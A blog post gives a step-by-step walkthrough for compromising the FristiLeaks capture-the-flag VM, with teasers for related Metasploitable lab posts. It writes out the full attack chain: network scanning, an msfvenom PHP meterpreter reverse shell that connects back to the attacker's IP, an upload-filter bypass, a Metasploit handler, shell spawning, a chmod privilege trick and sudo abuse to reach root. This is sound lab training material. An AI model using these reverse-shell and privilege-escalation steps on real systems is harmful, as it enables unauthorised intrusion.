Chuyển đến nội dung chính

Hack the Fristileaks VM (CTF Challenge)

Today we will walk through the FristiLeaks VM. There is nothing that we know about this VM except for the fact that security level is from beginner to intermediate. Also this VM only works on 08:00:27:A5:A6:76 MAC address or else it will not work.
WalkThrough
We will as always start with finding our target.
netdiscover
Our target is 192.168.0.101. Now scan the target with nmap script.
nmap -p- -A 192.168.0.101

As a result it shows us that port 80 is open. Therefore let’s open it in browser.

There is nothing on the page and the page source that prooves to be useful. So we used nikto to check it thoroughly and we found three directories i.e. /sisi , /cola , /beer. Three of these directories showed the following image:
In this page too there was nothing in the page source; also there was no metadata behind the image. And it occurred to me that fristi is also a drink like cola or beer or sisi and also there was reference to it on the home page so there is possibility that fristi is also a directory here. And there was no harm in trying it.
And the result was successful as we found admin portal with an image. Let’s look into its source page.

In the source page you will find a very different code as shown above. Copy this code and then right click on the image and select Inspect element (Q).
After clicking on the option a tab will open.

Select the longer code and paste the one here which you previously copied.

Once the code is pasted you will observe that the image is gone but some text appears. This text can be password. And if you remember the source code page there was a word eezeepz which can be our username. You can see it in the image below.
Enter the username and password and log in to it.

Once you log in you will find a page where you can upload something. So, here we will upload our malicious file. And to make it go to your terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 –f raw
Copy the code from <?php to die(); and save it in a text file with a .php extension. But when you try to upload it then there will be some error so just change the extension to .jpg and upload it.
Once the file is uploaded, type 192.168.0.101/fristi/uploads/shell.php.jpg in the browser to run it.

As the said is done, you will get a meterpreter session. And to get this session type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit
As the session is received type shell to go to the shell and then run the set of folowing commands to reach the terminal:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py


Then go to /www folder by typing:
cd www
ls –al (this command helps us see the list of files or folders)
Here we found a notes.txt. Lets read.
cat notes.txt

In notes.txt there a message from jerry who is hinting us to go in the home directory. Let’s try and do that by typing:
cd /home
ls –la
Here you will find list of all the usernames. If you try to enter any folder it says permission denied except for the eezeepz one. So type the following to go into it:
cd eezeepz

Once you enter eezeepz folder you will again find a notes.txt. Read it.
cat notes.txt

Again in the notes.txt there is message from jerry telling us what to do. So let’s follow his steps by typing:
Echo “/usr/bin/../../bin/chmod –R 777 /home/admin” > /tmp/runthis
After typing the command go back to home folder and from there go into the admin directory.
cd /home
ls –la
cd /admin
ls -la

In the admin directory you will find three important files i.e. cryptedpass.txt, cryptpass.py, whoisyougodnow.txt. Read these files one by one:
cat whoisyourgodnow.txt
cat cryptedpass.txt
cat cryptpass.py

Two of them will show some data in base 64 coded form. Now these can be passwords. Decode it and it will give you the word LetThereBeFristi!
Now switch users by typing:
su fristigod
Band then give password when asked i.e. LetThereBeFristi!
Then to check the id type:
id
And to check the list of files type;
ls -la
Now go to var and check what files it has and for that type :
cd /var
ls –la
You will find a folder called fristigod, to enter it and see the directories type :
cd fristigod
ls -la

In here you will find a directory .bash_history. It contains all the commands that were previously used by admin. Let’s read it.
cat .bash_history

We will try one of them that is:
sudo –l
And give the password when required.

Now to reach the flag follow the combination of following steps:
sudo –u fristi .secret_admin_stuff/docom /bin/sh
id
cd /root
ls –la
cat fristileaks_secrets.txt

And VOILA!!! You have extracted the flag. Congratulations.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
Nhãn:

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154. Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans. Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC E...
Đọc thêm